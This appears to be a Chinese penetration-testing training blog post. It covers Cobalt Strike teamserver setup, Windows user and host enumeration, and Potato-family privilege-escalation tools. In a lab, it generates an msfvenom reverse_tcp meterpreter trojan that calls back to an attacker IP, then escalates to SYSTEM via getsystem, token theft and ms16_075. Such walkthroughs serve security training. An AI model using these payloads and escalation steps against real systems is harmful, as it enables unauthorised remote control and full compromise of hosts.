实训第九天

1.安装CS

软件:cs4.8

1.准备

解压压缩包,解压后有server和client两个文件,将client留在本机,server文件上传到自己的linux虚拟机或者是vps上(以下配置在阿里云vps上)

2.server

server中有这些文件
在这里插入图片描述

给teamserver和TeamServerImage配置权限

chmod +u teamserver
chmod +u TeamServerImage

启动teamserver(第一个参数填vps公网ip,第二个参数填客户端连接密码)

./teamserver [vps_ip] [passwd]

cs默认端口50050
在这里插入图片描述

如图,启动成功,服务端配置完成

3.client

本机上打开Cobalt_Strike_CN.vbs
在这里插入图片描述

host为vps_ip,端口50050,密码填在服务端配置的密码,点击连接

在这里插入图片描述

连接后进入如下界面,说明连接成功

在这里插入图片描述

2.windows用户组和用户

1.用户

windows不同的用户有着不同的权限,权限主要包括有:完全控制、修改、读取和执行、列出文件夹

内容、读取、写入;超级管理员和system用户权限最高

内置用户

Administrator,系统管理员账号,拥有完全控制权

guest,来宾账号,提供访问共享资源的网络用户使用,仅具有基本权限,默认被禁用

查看本地用户

net user
net user [username]

查看当前用户

whoami
whoami /all

用户操作

net user [username]  [passwd]/add
net user [username] /del
net localgroup [groupname] [username] /add
net localgroup [groupname] [username] /del

2.用户组

用户也可以属于多个用户组,常见的用户组是管理组(Administrators)、普通用户组(Users)、iis用户组(IIS_IUSRS)、来宾组(Guests)、远程登录组(Remote Desktop Users)

内置用户组

administrators,管理员组

users组,新建用户默认所属的组

guests组,权限最低

iis_users组, Internet 信息服务使用的内置组

查看用户组

net localgroup
net localgroup [groupname]

3.windows信息搜集

当我们成功拿到普通用户权限时,可以通过执行一些命令拿到当前主机的配置和连接情况,方便之后的渗透以及帮助我们去寻找一些针对当前系统可以执行的exp或其他工具进行提权

常用命令

systeminfo  #获取系统信息
whoami /all #获取当前用户的详细信息
whoami /priv #显示当前用户的安全特权
net start #查看服务
quser or query user #获取在线用户
dir c:\programdata\ #分析安装杀软

4.总结手工提权思路,拿土豆提权

手工提权思路

当我们进入主机能够执行主机cmd命令时,可以通过执行命令搜集当前系统版本,补丁信息,针对当前的版本去寻找exp

土豆提权

土豆家族,可以挨个尝试(每个土豆的执行命令不同,使用时根据土豆名称去搜使用方法)

https://github.com/BeichenDream/BadPotato
https://github.com/BeichenDream/GodPotato
https://github.com/CCob/SweetPotato
https://github.com/klezVirus/CandyPotato
https://github.com/antonioCoco/RoguePotato
https://github.com/S3cur3Th1sSh1t/MultiPotato
https://github.com/crisprss/RasmanPotato
https://github.com/wh0amitz/PetitPotato
https://github.com/antonioCoco/JuicyPotatoNG
https://github.com/BeichenDream/PrintNotifyPotato
https://github.com/Prepouce/CoercedPotato

5.用CS插件提权

1.新建监听器,http hosts选择服务端ip,http port(c2)随便设置一个空闲端口
在这里插入图片描述

2.生成并上传木马,该实验提权的机器为winserver2k12,所以选择windows可执行程序,监听器选择刚才新建的,将生成的木马上传至虚拟机
在这里插入图片描述

3.运行木马,监听器监测到被害机上线,可以看到当前权限为管理员

在这里插入图片描述

4.使用插件梼杌进行权限提升,可以看到有许多模块可供使用,这里使用甜土豆

在这里插入图片描述

可以看到新建一个权限为system的连接,提权成功

在这里插入图片描述

6.MSF提权

这里使用win2k12 server模拟受害机

1.生成木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.44.138 lport=12345 -f exe >msf.exe 

lhost为kali的IP,lport为监听端口

2.上传木马到虚拟机
在这里插入图片描述

3.启动msf,使用模块监听,可以看到正在监听12345端口
在这里插入图片描述

3.运行受害机上木马,可看到已经建立连接,查看当前权限是管理员权限
在这里插入图片描述

4.meterpreter中有内置的提权命令getsystem,成功率很低
在这里插入图片描述

但是这里居然成功了

5.msf中还有一种盗取令牌的改变权限方式,这里先使用该方式进行降权,再用exp提权

meterpreter > ps   		#列出当前主机上进程id和进程执行的权限
meterpreter > [pid]		#将当前权限调整至进程号对应的权限,可升权可降权

在这里插入图片描述

6.退回到msf中,msf有自带的扫描模块post/multi/recon/local_exploit_suggester,可以匹配适用的exp,扫描结果如下,显示yes的都是可能存在的漏洞,可以依次尝试
在这里插入图片描述

7.这里使用土豆ms16_075_reflection_juicy进行提权操作
在这里插入图片描述

可以看到新建一个会话2,权限已经提升

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值